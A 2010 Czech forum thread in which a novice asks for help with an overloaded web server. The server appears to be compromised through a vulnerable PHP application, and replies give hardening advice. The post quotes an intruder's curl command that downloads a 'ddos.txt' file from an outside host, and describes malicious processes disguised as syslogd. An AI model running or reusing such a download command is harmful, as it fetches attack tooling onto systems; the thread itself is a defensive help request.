abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 17:33 | Nová verze

    Byla vydána nová stabilní verze 7.6 webového prohlížeče Vivaldi (Wikipedie). Postavena je na Chromiu 140. Přehled novinek i s náhledy v příspěvku na blogu.

    Ladislav Hagara | Komentářů: 0
    dnes 16:22 | Nová verze

    Byla vydána verze 1.90.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.

    Ladislav Hagara | Komentářů: 0
    dnes 16:11 | Nová verze

    GNUnet (Wikipedie) byl vydán v nové major verzi 0.25.0. Jedná se o framework pro decentralizované peer-to-peer síťování, na kterém je postavena řada aplikací.

    Ladislav Hagara | Komentářů: 0
    dnes 12:11 | Nová verze

    Byla vydána nová major verze 7.0 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Nově je postavena je na Debianu 13 (Trixie) a GNOME 48 (Bengaluru). Další novinky v příslušném seznamu.

    Ladislav Hagara | Komentářů: 0
    dnes 04:44 | IT novinky

    Společnost Meta na dvoudenní konferenci Meta Connect 2025 představuje své novinky. První den byly představeny nové AI brýle: Ray-Ban Meta (Gen 2), sportovní Oakley Meta Vanguard a především Meta Ray-Ban Display s integrovaným displejem a EMG náramkem pro ovládání.

    Ladislav Hagara | Komentářů: 0
    dnes 01:11 | Nová verze

    Po půl roce vývoje od vydání verze 48 bylo vydáno GNOME 49 s kódovým názvem Brescia (Mastodon). S přehrávačem videí Showtime místo Totemu a prohlížečem dokumentů Papers místo Evince. Podrobný přehled novinek i s náhledy v poznámkách k vydání a v novinkách pro vývojáře.

    Ladislav Hagara | Komentářů: 11
    včera 16:22 | Nová verze

    Open source softwarový stack ROCm (Wikipedie) pro vývoj AI a HPC na GPU od AMD byl vydán ve verzi 7.0.0. Přidána byla podpora AMD Instinct MI355X a MI350X.

    Ladislav Hagara | Komentářů: 0
    včera 15:22 | Nová verze

    Byla vydána nová verze 258 správce systému a služeb systemd (GitHub).

    Ladislav Hagara | Komentářů: 6
    včera 15:11 | Nová verze

    Byla vydána Java 25 / JDK 25. Nových vlastností (JEP - JDK Enhancement Proposal) je 18. Jedná se o LTS verzi.

    Ladislav Hagara | Komentářů: 0
    včera 14:44 | Humor

    Věra Pohlová před 26 lety: „Tyhle aféry každého jenom otravují. Já bych všechny ty internety a počítače zakázala“. Jde o odpověď na anketní otázku deníku Metro vydaného 17. září 1999 na téma zneužití údajů o sporožirových účtech klientů České spořitelny.

    Ladislav Hagara | Komentářů: 9
    Jaké řešení používáte k vývoji / práci?
     (39%)
     (55%)
     (6%)
     (9%)
     (12%)
     (9%)
     (12%)
     (9%)
     (15%)
    Celkem 33 hlasů
     Komentářů: 5, poslední dnes 22:30
    Rozcestník

    Dotaz: DDOS?? (urgent)

    10.8.2010 01:31 Martin
    DDOS?? (urgent)
    Přečteno: 477×
    Čus chlapi. Jsem začátečník a mám vlastní webserver s ubuntu 9.10. Ted se mi však často stává že se systém přetíží natolik že se nezapne ani LCD. Občas se mi povede chytnout dobrou chvilku a vidim tam ty žrouty: (výpis z webmina) ID USER CPU PŘÍKAZ 9422 www-data 46.3 % /sbin/syslogd 9429 www-data 27.8 % /sbin/klogd -c 1 -x -x 9427 www-data 26.0 % /sbin/syslogd

    No a právě teď jsem tam na chvíli zachytl proces pod tímto příkazem: curl -O http://www.salsayson.com/logs/ddos.txt -O ddos.txt

    Spuštěné to bylo pod www-data. Můžete mi pomoci? Jakou ochranu nasadit na server? Už tam mám firewall, nastavený dokonce i s dhcp. Ale přesto to přes něj projde :( Opravdu jsem ještě neznalý...

    Díky moc

    Odpovědi

    Jendа avatar 10.8.2010 02:31 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Máš tam záškodníka. Ale běží pod www-data, tzn. asi se mu nepodařilo získat roota (to bys ho třeba ani neviděl). Tipnul bych si, že hostuješ nějakou děravou PHP aplikaci, která umožňuje cizím lidem spouštět externí programy (v tomto případě v Perlu).
    10.8.2010 04:14 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    běží tam wordpress, e107, phpbb, oxid eshop. Web s e107 již potíže byli. Dokonce jsem musel několikrát nahrazovat celý root adresář. Na serveru mi také občas mizí obrázky (ze všech cms). Většinou to bývají loga.
    10.8.2010 08:57 NN
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Mam napad pokud jiz nemas "suhosin" pro PHP..

    NN
    10.8.2010 09:10 none
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Pomerne bezna situace. Je potreba zjistit jakou dirou se tam dostava. Nic sloziteho to nebude, nejspis neco v php (obligatni 'include $file' apod. Hledej v logach souvisejicich s tim zaznamem co jsi posilal (podle ip adresy, nazvu souboru apod.). Pokud ten proces bezi, najdes ho v /proc a uvidis i odkud byl spusten. A kdyz uz vis jak to funguje, tak musis vhodne nastavit apache/php/system tak, aby k tomu nemohlo dojit. Opravovat skript php, ktery je takhle deravy je neproduktivni, protoze jich bude pravdepodobne deravych vic a je jen otazkou casu, kdy se to bude opakovat. Nadruhou stranu nechat tam tu diru je taky hrich. Takze jednak opravit php skripty a jednak nakonfiguraovat prostredi tak, aby k tomu nemohlo dochazet. V php zakazat vsechny potencialne nebezpecne funkce (exec, system etc.), kazdemu hostingu dat jineho uzivatele s prislusnymi pravy a tak dale. Neni to jednoduche a neni to neprustrelne, bohuzel. Ale drtivou vetsinu tech utoku eliminujes. Prinejmensim tech robotickych.

    Jojo, provozovat LAMP/LAPP (a vubec jakykoliv) server neni pro kazdeho, je treba neco umet a znat system ktery pouzivas. Pockej az prijdou ucty za datovy prenos, stiznosti na spam na utoky apod. Vyplati se tomu rozumnet nebo to nechat odbornikum ;). Za par stovek ti ten server muze nekdo spravovat a mas klid.
    10.8.2010 12:18 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Většina byla již popsána, jen doplním, že před přetížením Vás mohou zachránit limity s vhodným nastavením. Potom se aspoň na ten server pravděpodobně lehce dostanete a může analyzovat a napravovat…
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    11.8.2010 07:50 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Takže mam v ubuntu vytvořit klasickýho uživatele a pak tomu uživateli přidělit root adresář webu? V tý e107 jsem dělal nějaké úpravy, takže sem možná někde nechal chmod 777. To bude určitě ono že? :) Systému ještě moc nerozumim, hlavně struktuře souborů, oprávnění a jejich smysl :D
    11.8.2010 10:29 alkoholik | skóre: 40 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    A co si o tom alespon neco malo precist?

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.